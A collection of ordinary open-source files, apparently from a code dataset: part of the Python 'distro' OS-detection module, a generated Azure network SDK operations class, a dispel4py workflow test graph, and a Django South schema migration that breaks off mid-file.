* lines: Iterable through the lines in the os-release file.
Each line must be a unicode string or a UTF-8 encoded byte
string.
Returns:
A dictionary containing all information items.
"""
props = {}
lexer = shlex.shlex(lines, posix=True)
lexer.whitespace_split = True
# The shlex module defines its `wordchars` variable using literals,
# making it dependent on the encoding of the Python source file.
# In Python 2.6 and 2.7, the shlex source file is encoded in
# 'iso-8859-1', and the `wordchars` variable is defined as a byte
# string. This causes a UnicodeDecodeError to be raised when the
# parsed content is a unicode object. The following fix resolves that
# (... but it should be fixed in shlex...):
if sys.version_info[0] == 2 and isinstance(lexer.wordchars, bytes):
lexer.wordchars = lexer.wordchars.decode('iso-8859-1')
tokens = list(lexer)
for token in tokens:
# At this point, all shell-like parsing has been done (i.e.
# comments processed, quotes and backslash escape sequences
# processed, multi-line values assembled, trailing newlines
# stripped, etc.), so the tokens are now either:
# * variable assignments: var=value
# * commands or their arguments (not allowed in os-release)
if '=' in token:
k, v = token.split('=', 1)
if isinstance(v, bytes):
v = v.decode('utf-8')
props[k.lower()] = v
if k == 'VERSION':
# this handles cases in which the codename is in
# the `(CODENAME)` (rhel, centos, fedora) format
# or in the `, CODENAME` format (Ubuntu).
codename = re.search(r'(\(\D+\))|,(\s+)?\D+', v)
if codename:
codename = codename.group()
codename = codename.strip('()')
codename = codename.strip(',')
codename = codename.strip()
# codename appears within paranthese.
props['codename'] = codename
else:
props['codename'] = ''
else:
# Ignore any tokens that are not variable assignments
pass
return props
def _get_lsb_release_info(self):
"""
Get the information items from the lsb_release command output.
Returns:
A dictionary containing all information items.
"""
cmd = 'lsb_release -a'
process = subprocess.Popen(
cmd,
shell=True,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
stdout, stderr = process.communicate()
stdout, stderr = stdout.decode('utf-8'), stderr.decode('utf-8')
code = process.returncode
if code == 0:
content = stdout.splitlines()
return self._parse_lsb_release_content(content)
elif code == 127: # Command not found
return {}
else:
if sys.version_info[:2] >= (3, 5):
raise subprocess.CalledProcessError(code, cmd, stdout, stderr)
elif sys.version_info[:2] >= (2, 7):
raise subprocess.CalledProcessError(code, cmd, stdout)
elif sys.version_info[:2] == (2, 6):
raise subprocess.CalledProcessError(code, cmd)
@staticmethod
def _parse_lsb_release_content(lines):
"""
Parse the output of the lsb_release command.
Parameters:
* lines: Iterable through the lines of the lsb_release output.
Each line must be a unicode string or a UTF-8 encoded byte
string.
Returns:
A dictionary containing all information items.
"""
props = {}
for line in lines:
line = line.decode('utf-8') if isinstance(line, bytes) else line
kv = line.strip('\n').split(':', 1)
if len(kv) != 2:
# Ignore lines without colon.
continue
k, v = kv
props.update({k.replace(' ', '_').lower(): v.strip()})
return props
def _get_distro_release_info(self):
"""
Get the information items from the specified distro release file.
Returns:
A dictionary containing all information items.
"""
if self.distro_release_file:
# If it was specified, we use it and parse what we can, even if
# its file name or content does not match the expected pattern.
distro_info = self._parse_distro_release_file(
self.distro_release_file)
basename = os.path.basename(self.distro_release_file)
# The file name pattern for user-specified distro release files
# is somewhat more tolerant (compared to when searching for the
# file), because we want to use what was specified as best as
# possible.
match = _DISTRO_RELEASE_BASENAME_PATTERN.match(basename)
if match:
distro_info['id'] = match.group(1)
return distro_info
else:
basenames = os.listdir(_UNIXCONFDIR)
# We sort for repeatability in cases where there are multiple
# distro specific files; e.g. CentOS, Oracle, Enterprise all
# containing `redhat-release` on top of their own.
basenames.sort()
for basename in basenames:
if basename in _DISTRO_RELEASE_IGNORE_BASENAMES:
continue
match = _DISTRO_RELEASE_BASENAME_PATTERN.match(basename)
if match:
filepath = os.path.join(_UNIXCONFDIR, basename)
distro_info = self._parse_distro_release_file(filepath)
if 'name' in distro_info:
# The name is always present if the pattern matches
self.distro_release_file = filepath
distro_info['id'] = match.group(1)
return distro_info
return {}
def _parse_distro_release_file(self, filepath):
"""
Parse a distro release file.
Parameters:
* filepath: Path name of the distro release file.
Returns:
A dictionary containing all information items.
"""
if os.path.isfile(filepath):
with open(filepath) as fp:
# Only parse the first line. For instance, on SLES there
# are multiple lines. We don't want them...
return self._parse_distro_release_content(fp.readline())
return {}
@staticmethod
def _parse_distro_release_content(line):
"""
Parse a line from a distro release file.
Parameters:
* line: Line from the distro release file. Must be a unicode string
or a UTF-8 encoded byte string.
Returns:
A dictionary containing all information items.
"""
if isinstance(line, bytes):
line = line.decode('utf-8')
matches = _DISTRO_RELEASE_CONTENT_REVERSED_PATTERN.match(
line.strip()[::-1])
distro_info = {}
if matches:
# regexp ensures non-None
distro_info['name'] = matches.group(3)[::-1]
if matches.group(2):
distro_info['version_id'] = matches.group(2)[::-1]
if matches.group(1):
distro_info['codename'] = matches.group(1)[::-1]
elif line:
distro_info['name'] = line.strip()
return distro_info
_distro = LinuxDistribution()
def main():
import argparse
logger = logging.getLogger(__name__)
logger.setLevel(logging.DEBUG)
logger.addHandler(logging.StreamHandler(sys.stdout))
parser = argparse.ArgumentParser(description="Linux distro info tool")
parser.add_argument(
'--json',
'-j',
help="Output in machine readable format",
action="store_true")
args = parser.parse_args()
if args.json:
logger.info(json.dumps(info(), indent=4, sort_keys=True))
else:
logger.info('Name: %s', name(pretty=True))
distribution_version = version(pretty=True)
if distribution_version:
logger.info('Version: %s', distribution_version)
distribution_codename = codename()
if distribution_codename:
logger.info('Codename: %s', distribution_codename)
if __name__ == '__main__':
main()
|
gpl-3.0
|
Azure/azure-sdk-for-python
|
sdk/network/azure-mgmt-network/azure/mgmt/network/v2019_02_01/aio/operations/_hub_virtual_network_connections_operations.py
|
1
|
8982
|
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from typing import Any, AsyncIterable, Callable, Dict, Generic, Optional, TypeVar
import warnings
from azure.core.async_paging import AsyncItemPaged, AsyncList
from azure.core.exceptions import ClientAuthenticationError, HttpResponseError, ResourceExistsError, ResourceNotFoundError, map_error
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import AsyncHttpResponse, HttpRequest
from azure.mgmt.core.exceptions import ARMErrorFormat
from ... import models as _models
T = TypeVar('T')
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, AsyncHttpResponse], T, Dict[str, Any]], Any]]
class HubVirtualNetworkConnectionsOperations:
"""HubVirtualNetworkConnectionsOperations async operations.
You should not instantiate this class directly. Instead, you should create a Client instance that
instantiates it for you and attaches it as an attribute.
:ivar models: Alias to model classes used in this operation group.
:type models: ~azure.mgmt.network.v2019_02_01.models
:param client: Client for service requests.
:param config: Configuration of service client.
:param serializer: An object model serializer.
:param deserializer: An object model deserializer.
"""
models = _models
def __init__(self, client, config, serializer, deserializer) -> None:
self._client = client
self._serialize = serializer
self._deserialize = deserializer
self._config = config
async def get(
self,
resource_group_name: str,
virtual_hub_name: str,
connection_name: str,
**kwargs
) -> "_models.HubVirtualNetworkConnection":
"""Retrieves the details of a HubVirtualNetworkConnection.
:param resource_group_name: The resource group name of the VirtualHub.
:type resource_group_name: str
:param virtual_hub_name: The name of the VirtualHub.
:type virtual_hub_name: str
:param connection_name: The name of the vpn connection.
:type connection_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: HubVirtualNetworkConnection, or the result of cls(response)
:rtype: ~azure.mgmt.network.v2019_02_01.models.HubVirtualNetworkConnection
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.HubVirtualNetworkConnection"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2019-02-01"
accept = "application/json"
# Construct URL
url = self.get.metadata['url'] # type: ignore
path_format_arguments = {
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'virtualHubName': self._serialize.url("virtual_hub_name", virtual_hub_name, 'str'),
'connectionName': self._serialize.url("connection_name", connection_name, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.get(url, query_parameters, header_parameters)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.Error, response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
deserialized = self._deserialize('HubVirtualNetworkConnection', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/virtualHubs/{virtualHubName}/hubVirtualNetworkConnections/{connectionName}'} # type: ignore
def list(
self,
resource_group_name: str,
virtual_hub_name: str,
**kwargs
) -> AsyncIterable["_models.ListHubVirtualNetworkConnectionsResult"]:
"""Retrieves the details of all HubVirtualNetworkConnections.
:param resource_group_name: The resource group name of the VirtualHub.
:type resource_group_name: str
:param virtual_hub_name: The name of the VirtualHub.
:type virtual_hub_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either ListHubVirtualNetworkConnectionsResult or the result of cls(response)
:rtype: ~azure.core.async_paging.AsyncItemPaged[~azure.mgmt.network.v2019_02_01.models.ListHubVirtualNetworkConnectionsResult]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.ListHubVirtualNetworkConnectionsResult"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2019-02-01"
accept = "application/json"
def prepare_request(next_link=None):
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
if not next_link:
# Construct URL
url = self.list.metadata['url'] # type: ignore
path_format_arguments = {
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'virtualHubName': self._serialize.url("virtual_hub_name", virtual_hub_name, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
request = self._client.get(url, query_parameters, header_parameters)
else:
url = next_link
query_parameters = {} # type: Dict[str, Any]
request = self._client.get(url, query_parameters, header_parameters)
return request
async def extract_data(pipeline_response):
deserialized = self._deserialize('ListHubVirtualNetworkConnectionsResult', pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, AsyncList(list_of_elem)
async def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
error = self._deserialize.failsafe_deserialize(_models.Error, response)
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
return pipeline_response
return AsyncItemPaged(
get_next, extract_data
)
list.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/virtualHubs/{virtualHubName}/hubVirtualNetworkConnections'} # type: ignore
|
mit
|
KNMI/VERCE
|
verce-hpc-pe/src/test/graph_testing/grouping_alltoone.py
|
3
|
4256
|
'''
This is a dispy graph which produces a workflow with a pipeline
in which the producer node ``prod`` sends data to the consumer node ``cons1`` which then sends data to node ``cons2``.
Note that in this graph we have defined several instances of the cons1 and cons2 nodes
and all the instances of the cons1 node are sending data to only one instance of cons2 node.
This type of grouping is called *global* in dispy (all to one).
It can be executed with MPI and STORM.
* MPI: Please, locate yourself into the dispy directory.
Execute the MPI mapping as follows::
mpiexec -n <number mpi_processes> python -m dispel4py.worker_mpi <name_dispy_graph> <-f file containing the input dataset in JSON format>
<-i number of iterations/runs'> <-s>
The argument '-s' forces to run the graph in a simple processing, which means that the first node of the graph will be executed in a process, and the rest of nodes will be executed in a second process.
When <-i number of interations/runs> is not indicated, the graph is executed once by default.
For example::
mpiexec -n 11 python -m dispel4py.worker_mpi test.graph_testing.grouping_alltoone -i 10
.. note::
Each node in the graph is executed as a separate MPI process.
This graph has 11 nodes. For this reason we need at least 11 MPI processes to execute it.
Output::
Processing 10 iterations
Processes: {'TestProducer0': [5], 'TestOneInOneOut2': [6, 7, 8, 9, 10], 'TestOneInOneOut1': [0, 1, 2, 3, 4]}
TestOneInOneOut1 (rank 0): I'm a bolt
TestOneInOneOut1 (rank 1): I'm a bolt
TestOneInOneOut2 (rank 9): I'm a bolt
TestOneInOneOut1 (rank 2): I'm a bolt
TestOneInOneOut1 (rank 4): I'm a bolt
TestOneInOneOut1 (rank 3): I'm a bolt
TestProducer0 (rank 5): I'm a spout
TestOneInOneOut2 (rank 7): I'm a bolt
Rank 5: Sending terminate message to [0, 1, 2, 3, 4]
TestProducer0 (rank 5): Processed 10 input block(s)
TestProducer0 (rank 5): Completed.
TestOneInOneOut1 (rank 3): Processed 2 input block(s)
TestOneInOneOut1 (rank 3): Completed.
TestOneInOneOut1 (rank 1): Processed 2 input block(s)
TestOneInOneOut1 (rank 1): Completed.
TestOneInOneOut1 (rank 4): Processed 2 input block(s)
TestOneInOneOut1 (rank 4): Completed.
TestOneInOneOut1 (rank 2): Processed 2 input block(s)
TestOneInOneOut1 (rank 2): Completed.
Rank 0: Sending terminate message to [6, 7, 8, 9, 10]
TestOneInOneOut1 (rank 0): Processed 2 input block(s)
TestOneInOneOut1 (rank 0): Completed.
TestOneInOneOut2 (rank 8): I'm a bolt
TestOneInOneOut2 (rank 8): Processed 0 input block(s)
TestOneInOneOut2 (rank 8): Completed.
TestOneInOneOut2 (rank 9): Processed 0 input block(s)
TestOneInOneOut2 (rank 9): Completed.
TestOneInOneOut2 (rank 7): Processed 0 input block(s)
TestOneInOneOut2 (rank 7): Completed.
TestOneInOneOut2 (rank 10): I'm a bolt
TestOneInOneOut2 (rank 10): Processed 0 input block(s)
TestOneInOneOut2 (rank 10): Completed.
TestOneInOneOut2 (rank 6): I'm a bolt
TestOneInOneOut2 (rank 6): Processed 10 input block(s)
TestOneInOneOut2 (rank 6): Completed.
Note that only one instance of the consumer node ``TestOneInOneOut2`` (rank 6) received all the input blocks from the previous PE,
as the grouping has been defined as `global`.
* STORM:
'''
from test.graph_testing import testing_PEs as t
from dispel4py.workflow_graph import WorkflowGraph
def testAlltoOne():
'''
Creates a graph with two consumer nodes and a global grouping.
:rtype: the created graph
'''
graph = WorkflowGraph()
prod = t.TestProducer()
cons1 = t.TestOneInOneOut()
cons2 = t.TestOneInOneOut()
cons1.numprocesses=5
cons2.numprocesses=5
graph.connect(prod, 'output', cons1, 'input')
cons2.inputconnections['input']['grouping'] = 'global'
graph.connect(cons1, 'output', cons2, 'input')
return graph
''' important: this is the graph_variable '''
graph = testAlltoOne()
|
mit
|
Squishymedia/feedingdb
|
src/feeddb/feed/migrations/0058_muscleowl_emg_sono.py
|
1
|
40048
|
# -*- coding: utf-8 -*-
from south.utils import datetime_utils as datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding field 'SonoSensor.muscle'
db.add_column(u'feed_sonosensor', 'muscle',
self.gf('django.db.models.fields.related.ForeignKey')(to=orm['feed.MuscleOwl'], null=True),
keep_default=False)
# Adding field 'EmgSensor.muscle'
db.add_column(u'feed_emgsensor', 'muscle',
self.gf('django.db.models.fields.related.ForeignKey')(to=orm['feed.MuscleOwl'], null=True),
keep_default=False)
def backwards(self, orm):
# Deleting field 'SonoSensor.muscle'
db.delete_column(u'feed_sonosensor', 'muscle_id')
# Deleting field 'EmgSensor.muscle'
db.delete_column(u'feed_emgsensor', 'muscle_id')
models = {
u'auth.group': {
'Meta': {'object_name': 'Group'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
u'auth.permission': {
'Meta': {'ordering': "(u'content_type__app_label', u'content_type__model', u'codename')", 'unique_together': "((u'content_type', u'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['contenttypes.ContentType']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
u'auth.user': {
'Meta': {'object_name': 'User'},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'related_name': "u'user_set'", 'blank': 'True', 'to': u"orm['auth.Group']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'related_name': "u'user_set'", 'blank': 'True', 'to': u"orm['auth.Permission']"}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
},
u'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
u'feed.ageunit': {
'Meta': {'ordering': "['label']", 'object_name': 'AgeUnit'},
'created_at': ('django.db.models.fields.DateTimeField', [], {}),
'created_by': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'ageunit_related'", 'null': 'True', 'to': u"orm['auth.User']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'label': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'updated_at': ('django.db.models.fields.DateTimeField', [], {})
},
u'feed.anatomicallocation': {
'Meta': {'ordering': "['label']", 'object_name': 'AnatomicalLocation'},
'category': ('django.db.models.fields.IntegerField', [], {}),
'created_at': ('django.db.models.fields.DateTimeField', [], {}),
'created_by': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'anatomicallocation_related'", 'null': 'True', 'to': u"orm['auth.User']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'label': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'updated_at': ('django.db.models.fields.DateTimeField', [], {})
},
u'feed.anteriorposterioraxis': {
'Meta': {'object_name': 'AnteriorPosteriorAxis'},
'created_at': ('django.db.models.fields.DateTimeField', [], {}),
'created_by': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'anteriorposterioraxis_related'", 'null': 'True', 'to': u"orm['auth.User']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'label': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'updated_at': ('django.db.models.fields.DateTimeField', [], {})
},
u'feed.behavior': {
'Meta': {'ordering': "['label']", 'object_name': 'Behavior'},
'created_at': ('django.db.models.fields.DateTimeField', [], {}),
'created_by': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'behavior_related'", 'null': 'True', 'to': u"orm['auth.User']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'label': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'updated_at': ('django.db.models.fields.DateTimeField', [], {})
},
u'feed.behaviorowl': {
'Meta': {'object_name': 'BehaviorOwl'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'label': ('django.db.models.fields.CharField', [], {'max_length': '1000'}),
'obo_definition': ('django.db.models.fields.TextField', [], {}),
'rdfs_comment': ('django.db.models.fields.TextField', [], {}),
'rdfs_subClassOf_ancestors': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['feed.BehaviorOwl']", 'symmetrical': 'False'}),
'uri': ('django.db.models.fields.CharField', [], {'max_length': '1500'})
},
u'feed.channel': {
'Meta': {'object_name': 'Channel'},
'created_at': ('django.db.models.fields.DateTimeField', [], {}),
'created_by': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'channel_related'", 'null': 'True', 'to': u"orm['auth.User']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'notes': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'rate': ('django.db.models.fields.IntegerField', [], {}),
'setup': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['feed.Setup']"}),
'updated_at': ('django.db.models.fields.DateTimeField', [], {})
},
u'feed.channellineup': {
'Meta': {'ordering': "['position']", 'object_name': 'ChannelLineup'},
'channel': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['feed.Channel']", 'null': 'True', 'blank': 'True'}),
'created_at': ('django.db.models.fields.DateTimeField', [], {}),
'created_by': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'channellineup_related'", 'null': 'True', 'to': u"orm['auth.User']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'position': ('django.db.models.fields.IntegerField', [], {}),
'session': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['feed.Session']"}),
'updated_at': ('django.db.models.fields.DateTimeField', [], {})
},
u'feed.depthaxis': {
'Meta': {'object_name': 'DepthAxis'},
'created_at': ('django.db.models.fields.DateTimeField', [], {}),
'created_by': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'depthaxis_related'", 'null': 'True', 'to': u"orm['auth.User']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'label': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'updated_at': ('django.db.models.fields.DateTimeField', [], {})
},
u'feed.developmentstage': {
'Meta': {'ordering': "['label']", 'object_name': 'DevelopmentStage'},
'created_at': ('django.db.models.fields.DateTimeField', [], {}),
'created_by': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'developmentstage_related'", 'null': 'True', 'to': u"orm['auth.User']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'label': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'updated_at': ('django.db.models.fields.DateTimeField', [], {})
},
u'feed.dorsalventralaxis': {
'Meta': {'object_name': 'DorsalVentralAxis'},
'created_at': ('django.db.models.fields.DateTimeField', [], {}),
'created_by': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'dorsalventralaxis_related'", 'null': 'True', 'to': u"orm['auth.User']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'label': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'updated_at': ('django.db.models.fields.DateTimeField', [], {})
},
u'feed.electrodetype': {
'Meta': {'ordering': "['label']", 'object_name': 'ElectrodeType'},
'created_at': ('django.db.models.fields.DateTimeField', [], {}),
'created_by': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'electrodetype_related'", 'null': 'True', 'to': u"orm['auth.User']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'label': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'updated_at': ('django.db.models.fields.DateTimeField', [], {})
},
u'feed.emgchannel': {
'Meta': {'object_name': 'EmgChannel', '_ormbases': [u'feed.Channel']},
u'channel_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': u"orm['feed.Channel']", 'unique': 'True', 'primary_key': 'True'}),
'emg_amplification': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'emg_filtering': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['feed.Emgfiltering']"}),
'sensor': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['feed.EmgSensor']"}),
'unit': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['feed.Unit']"})
},
u'feed.emgfiltering': {
'Meta': {'ordering': "['label']", 'object_name': 'Emgfiltering'},
'created_at': ('django.db.models.fields.DateTimeField', [], {}),
'created_by': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'emgfiltering_related'", 'null': 'True', 'to': u"orm['auth.User']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'label': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'updated_at': ('django.db.models.fields.DateTimeField', [], {})
},
u'feed.emgsensor': {
'Meta': {'ordering': "['id']", 'object_name': 'EmgSensor', '_ormbases': [u'feed.Sensor']},
'axisdepth': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['feed.DepthAxis']", 'null': 'True', 'blank': 'True'}),
'electrode_type': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['feed.ElectrodeType']", 'null': 'True', 'blank': 'True'}),
'location_controlled': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['feed.AnatomicalLocation']"}),
'muscle': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['feed.MuscleOwl']", 'null': 'True'}),
u'sensor_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': u"orm['feed.Sensor']", 'unique': 'True', 'primary_key': 'True'})
},
u'feed.emgsetup': {
'Meta': {'object_name': 'EmgSetup', '_ormbases': [u'feed.Setup']},
'preamplifier': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
u'setup_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': u"orm['feed.Setup']", 'unique': 'True', 'primary_key': 'True'})
},
u'feed.eventchannel': {
'Meta': {'object_name': 'EventChannel', '_ormbases': [u'feed.Channel']},
u'channel_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': u"orm['feed.Channel']", 'unique': 'True', 'primary_key': 'True'}),
'unit': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'})
},
u'feed.eventsetup': {
'Meta': {'object_name': 'EventSetup', '_ormbases': [u'feed.Setup']},
u'setup_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': u"orm['feed.Setup']", 'unique': 'True', 'primary_key': 'True'})
},
u'feed.experiment': {
'Meta': {'object_name': 'Experiment'},
'accession': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'bookkeeping': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'created_at': ('django.db.models.fields.DateTimeField', [], {}),
'created_by': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'experiment_related'", 'null': 'True', 'to': u"orm['auth.User']"}),
'description': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'end': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'impl_notes': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'start': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'study': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['feed.Study']"}),
'subj_age': ('django.db.models.fields.DecimalField', [], {'null': 'True', 'max_digits': '19', 'decimal_places': '5', 'blank': 'True'}),
'subj_ageunit': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['feed.AgeUnit']", 'null': 'True', 'blank': 'True'}),
'subj_devstage': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['feed.DevelopmentStage']"}),
'subj_tooth': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'subj_weight': ('django.db.models.fields.DecimalField', [], {'null': 'True', 'max_digits': '19', 'decimal_places': '5', 'blank': 'True'}),
'subject': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['feed.Subject']"}),
'subject_notes': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'updated_at': ('django.db.models.fields.DateTimeField', [], {})
},
u'feed.forcechannel': {
'Meta': {'object_name': 'ForceChannel', '_ormbases': [u'feed.Channel']},
u'channel_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': u"orm['feed.Channel']", 'unique': 'True', 'primary_key': 'True'}),
